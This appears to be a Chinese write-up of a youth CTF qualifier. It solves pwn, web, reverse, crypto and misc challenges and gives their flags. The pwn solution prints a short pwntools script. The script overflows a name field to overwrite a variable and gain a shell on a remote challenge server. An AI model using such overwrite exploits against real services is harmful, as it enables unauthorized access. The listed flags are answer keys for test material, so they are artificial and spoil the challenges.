第四屆“強網杯”全國網路安全挑戰賽青少年專項賽選拔賽
加減乘除
ida 反編譯,發現輸入 name 的地方存在變數覆寫
繼續分析
(a) passcode = 3
(b) passcode += 4
? passcode *= 7
(d) passcode /= 5
passcode 初始值為 0,通過 a,b,c,d 進行運算,但不能大于 66,最后結果等于 66 就可以往下執行
,下面有個 if ( dword_40A0 )陳述句,需要 dword_40A0 為1,即可獲取 shell,前面發現了 name 存
在變數覆寫,可以覆寫到 dword_40A0
腳本:
from pwn import *
#p=process('pwn1')
p=remote('182.92.184.215','12345')
p.sendlineafter('start: ','1'*100)
s='bcbdcbbbbbb'
for i in s:
p.sendlineafter('> ',i)
#p.sendline('Y')
p.interactive()
flag{c4dd24338491778fb938a95c83a6a2cf}
easy_http
GET 傳參 fruit=apple
POST 傳參 vegetable=potato
修改請求頭 User-Agent: Http_1s_W0nd3rful

簡單演算法
腳本:
s=[49, 60, 58, 53, 50, 107, 117, 63, 57, 107, 63, 109, 66, 137, 65, 119, 118, 128, 142, 118, 117, 118,
123, 147, 77, 126, 130, 124, 152, 80, 127, 134, 83, 87, 134, 87, 147, 148, 142, 95, 93, 85]
flag=''
k=0
for i in s:
k=k+1
flag+=chr(i-k^86)
print flag
flag{38af7b7c-d138-4662-b216-d60dc5e881ab}
easy_Crypto
Crypto3_1.txt 內容? ω ?ノ=/
m ?)ノ~ ┻━┻ //* ? ?*/[’_’];o=…這種是 aaencode 加密解密網址:https://www.qtool.net/decode

得到數字5
crypto3_2.png 為豬圈加密
解密網址:http://ctf.ssleye.com/pigpen.html
根據題目描述可以得知柵欄加密了,剛剛 aadecode 解密得到柵欄數為5
解密網址:https://cryptii.com/pipes/rail-fence-cipher
flag{cryptography_is_so_insteresting}
base64
題目給出了明文和密文,還有個 flag 的密文
直接 base64 解碼失敗,猜測可能是 base64 變換了密碼表
根據密文和明文來推測一下
原資料:
sadhlkj122i3upoi213456aABSADHKJHLKJSADSADJLKHUOIPQWUEYUGHJ12345678901223
3165410123123456789123709864hjklhfjldsnfzkpidjskljkamxcvmbcxamvbnm
加密后的資料:
h2QDfRrKfCPsxFDticMpfYTrxtV1yFQMVEyMWPAwXDAxX0IYVZWYVZWvYPnTaZ9uZQQ
caZaeaZiTXCPsxtV1yCh4zYLrxCTtxtP2yYVrxOPsxtPsxtV1yCh4zYPsxthqzYl2yRAJf2rHeFIme
SyoeGIKhREDfGyKgRIKdb14d3endFy4db12dF5nn
自己 base64 加密的密文
c2FkaGxrajEyMmkzdXBvaTIxMzQ1NmFBQlNBREhLSkhMS0pTQURTQURKTEtIVU9JUFFX
VUVZVUdISjEyMzQ1Njc4OTAxMjIzMzE2NTQxMDEyMzEyMzQ1Njc4OTEyMzcwOTg2NGh
qa2xoZmpsZHNuZnprcGlkanNrbGprYW14Y3ZtYmN4YW12Ym5t
可以發現 base64 加密后的 c 被替換成了 h,數字不變,F 替換成了 Q,以此類推
根據上面的方法,將 flag.txt 里的密文進行還原
ZmxhZ3t (N)未知 YXNlNjRfMXNfUzBfRjRudGE1dGlj (k)未知 Q==
但是沒有找到 k 和 N,需要猜測一下
通過 flag 格式可以推斷出來 k → f
還有一個暴力猜測得到 N → C
所以最侄訓原的密文為:
ZmxhZ3tCYXNlNjRfMXNfUzBfRjRudGE1dGljfQ==
flag{Base64_1s_S0_F4nta5tic}
moss
打開檔案得到一串摩斯密碼,拿去解密得到 F L A G %u7b M O S S I S V E R Y F 4 N T Y %u7d ,
發現這并不是 flag 格式,然后把字母全部替換成小寫,根據 flag 格式把%u7b 和%u7d 換成{ }
flag{mossisveryf4nty}
easy_pcap
打開 easy_pcap 包,根據題意網路流量就是用戶通過網路傳輸的資料,馬上過濾 http contains php
ZmxhZyU3QjElMjdtX0g0Y0tfVjFzaTdfWTB1Ul9Db01wdXRlcl9hd2VTb21lJTdE.php
base64 解密得
python 腳本:
import base64
a='ZmxhZyU3QjElMjdtX0g0Y0tfVjFzaTdfWTB1Ul9Db01wdXRlcl9hd2VTb21lJTdE'
b=base64.b64decode(a)
print(b)
得到 flag%7B1%27m_H4cK_V1si7_Y0uR_CoMputer_aweSome%7D,再 URL 解碼得
flag{1’m_H4cK_V1si7_Y0uR_CoMputer_aweSome}
git 謎底
解壓檔案看到里面有個.git 檔案夾,查看檔案夾里的檔案發現 config 檔案里有一個鏈接:
https://github.com/maxcruz/stegano_midi;
用瀏覽器打開下載工具,工具里的 README.md 檔案可以查看使用方法;
接下來吧我們的 enjoy.mid 檔案復制到工具里,使用方法:python stegano-midi.py --reveal –
file=enjoy.mid 解出 flag
注:如果運行顯示缺少庫,請根據報錯提示安裝;
flag{misc_stegano_is_everywhere}
Luo_Tianyi
根據題目描述首先想到用 binwalk 查看有沒有隱藏檔案,無果;
然后繼續審題,發現題目名字不同尋常,猜測是 steghide 隱寫;
用 steghide 工具: steghide extract -sf timg.jpg -p luotianyi 得到 flag.txt,打開即可以看到 flag
flag{8dfe88db-0def-4873-9f17-f9c46bd571b6}
misc_made_up
使用binwalk -e java.png把圖片的隱藏檔案分離出來,得到一個壓縮包,壓縮包的密碼是若密碼123456;解壓后得到一個txt檔案,查看檔案內容發現底部有看不到的字符,根據第四屆強網杯的一道miscstudy題知道這是html隱寫

工具可以在百度搜索下載,輸入命令解碼即可:SNOW.EXE -C -p +“密碼” +txt檔案 即可得到flag
flag{tools_is_the_key_of_misc}
一切皆可視
根據題目描述,百度查了一下可視化編程,科普到了 span 語言,在把附件 baby_code.xml 打
開并審查發現有一個 https://snap.berkeley.edu 鏈接,正好是 snap 語言并打開鏈接:
如圖點擊運行:

然后等待加載一會兒,進入下一個頁面,如下圖

我們先把 xml 檔案匯入到里面,然后點擊 Variables,把右邊的 test 托到 say no!!! for 5 secs,把no!!!這個條件覆寫成 test 如下圖:

我們看到串列的那串數字,通過 flag 格式輸入發現最下面 5 位剛好是 flag{ ,得知是從下往上的規律:

通過字符集(qwertyuiopasdfghjklzxcvbnm1234567890@!{})輸入推斷得到 flag:
flag{w3l1C0m3@nd_G00d_lUck!}
轉載請註明出處,本文鏈接:https://www.uj5u.com/houduan/1407.html
標籤:python
